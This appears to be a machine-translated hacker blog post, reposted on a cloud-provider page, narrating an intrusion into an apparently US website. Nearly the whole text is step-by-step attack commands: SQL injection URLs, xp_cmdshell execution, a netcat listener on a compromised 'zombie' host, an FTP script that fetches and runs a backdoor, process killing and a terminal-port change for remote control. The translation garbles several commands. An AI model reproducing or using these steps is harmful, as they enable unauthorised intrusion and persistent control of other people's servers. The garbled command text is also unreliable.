A process of penetrating USA website through injection
Author: Rover [play8.net]
I have read many injection articles over the past few days ~ Are you ready to find a site for injection ~ I am from China ~ Not patriotic ~ No one can afford to scold ~~~~
The most basic requirement for injection is to find an injection point ~ Where can I find so many injection points ~ I think of Google
I found a classic injection point suffix. asp? Id = 8, select "search all webpages",. Ha, a large English leaf
Manual test on one click ~
Http://xxx.com/list.asp? Id = 8'
If single quotes are filtered, the normal page is returned ~
After finding a lot of websites, I finally found a legendary injection point.
Http://www.sssd.com/program_detail.asp? Id = 8'
Error Type:
Microsoft ole db provider for ODBC drivers (0x80040e14)
[Microsoft] [odbc SQL Server Driver] [SQL Server] unclosed quotation mark before the character string ''.
Good ~ It indicates that injection is very likely ~ What's more, it's MSSQL.
Retest
Http://www.sssd.com/program_detail.asp? Id = 8 and 0 <> (select @ version )-
This is the version of the other system and the SQL version.
Return
Error Type:
Microsoft ole db provider for ODBC drivers (0x80040e07)
[Microsoft] [odbc SQL Server Driver] [SQL Server] syntax error converting the nvarchar value 'Microsoft SQL Server 2000-8.00.760 (Intel x86) Dec 17 2002 14:22:05 copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (build 2195: Service Pack 4) 'To a column of Data Type Int.
/Program_detail.asp, line 15
Well, it's nt5.0 + SP4 ~ We're not picky about the U.S..
Check whether the SQL account on the web page has DBO permissions. If so, we may use xp_mongoshell to execute system commands.
Http://www.sssd.com/program_detail.asp? Id = 8 and user_name () = 'dbo'
Return to normal page ~ Hoho ~~ It indicates that the other party uses the SQL Server account with the DBO permission.
The next step is to get the system permission ~
According to the method used in the network, the physical path of the web should be obtained and then transmitted to webshell ~
However, the method I have seen is still not exposed to the web path of the remote host.
I asked 13 K for a storm path code that is said to be omnipotent.
Http://www.sssd.com/program_detail.asp? Id = 8; Create Table [DBO]. [13 K] ([Fuck] [char] (255 ));--
Http://www.sssd.com/program_detail.asp? Id = 8; declare @ result varchar (255) exec master. DBO. xp_regread 'HKEY _ LOCAL_MACHINE ', 'System/controlset001/services/w3svc/parameters/virtual roots', '/', @ result output insert into 13 K (Fuck) values (@ result );--
Http://www.sssd.com/program_detail.asp? Id = 8 and (select top 1 fuck from 13 K) = 1
This Code reads the web path of the other party from the registry and writes it to a table. Finally, it queries the path of the table exposed to the Web. However, the Code fails at all, and an error occurs in the second sentence.
If not, change the method ~ Check whether the other party has deleted the xp_mongoshell extension.
Listen to port 99 on the zombie
NC-L-VV-p 99
Http://www.sssd.com/program_detail.asp? Id = 8; Exec master. DBO. xp_mongoshell 'telnet zombie IP 99 ';--
Right away, the NC on my bot will respond. Haha ~, Xp_mongoshell and
Http://www.sssd.com/program_detail.asp? Id = 8; Exec master. DBO. xp_cmdshell 'net start TlntSvr ';--
Open the telnet service ~
Return to normal page ~ It indicates that our command may be successful.
My mother Telnet www.sssd.com and the system tells me that the remote host port 23 cannot be connected.
Depressing ~ It seems that the other party has filtered out the port
Since system commands can be executed, use the one under shell ~ Haha ~
Configure a backdoor first. I use hxdef100 (which can pass through the firewall, I like it), configure it, And then install it automatically. CMD: Use WinRAR to make the self-solution package. After the self-solution is configured, install is automatically executed. CMD install Backdoor
Http://www.sssd.com/program_detail.asp? Id = 8; Exec master. DBO. xp_mongoshell 'echo open ftpserver port> T. T ';--
Http://www.sssd.com/program_detail.asp? Id = 8; ecex master. DBO. xp_mongoshell 'echo user> C:/T. t'
Http://www.sssd.com/program_detail.asp? Id = 8; Exec master. DBO. xp_mongoshell 'echo pass> C:/T. t'
Http://www.sssd.com/program_detail.asp? Id = 8; Exec master. DBO. xp_mongoshell 'echo get rover.exe> C:/T. t'
Http://www.sssd.com/program_detail.asp? Id = 8; Exec master. DBO. xp_mongoshell 'echo bye> C:/T. t'
Write an FTP batch file ~ Haha ~ Then we execute
Http://www.sssd.com/program_detail.asp? Id = 8; Exec master. DBO. xp_mongoshell 'ftp-S: T. t'
That rover.exe is the configured backdoor, which returns to the normal page and is probably downloaded.
Execute a backdoor ~
Http://www.sssd.com/program_detail.asp? Id = 8; Exec master.dbo.xp_{shell'rover.exe'
Okay ~ Now use a Backdoor client to connect to host 80 and enter the password, Hoho ~~~ A shell appears ~~
For admin permission, net starts the token and finds that the remote token has enabled the token service, and transfers it to terninalport.exe (a small item for viewing and modifying the Terminal Service port) and finds that the port is 3389.
Telnet www.sssd.com 3389 prompts that the connection is not available, nnd, filtered ~ God ~~
At that time, I guess it was a problem with the firewall on the other host ~ Upload pskilland fport.exe to kill suspicious processes ~ Telnet 3389 again, or not ~ Try again ~ When I saw WinVNC control software installed on his host, I was bold enough to guess that it was used by the Administrator. I used telnet to my mother at WWW and Na was f. com 5800 ~~ Abnormal Administrator ~ There is no need for proper terminal management, instead of using VNC, faint ~~
Pskill WinVNC ~
Kill the WinVNC process and delete the WinVNC service file ~ Mom, you are starting again ~
Last
Terninalport 5800
Change the terminal port to 5800 and restart the system ~~
2 minutes later, I connected to www.sssd.com through a terminal: 5800 successfully ~ Hoho ~~~
After being connected, we can find that this host does not have any firewall or ispec policies ~ Port filtering is fully implemented on routes, nnd
There is nothing technical in this article ~ It's just an idea ~ Hope to be useful to you
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.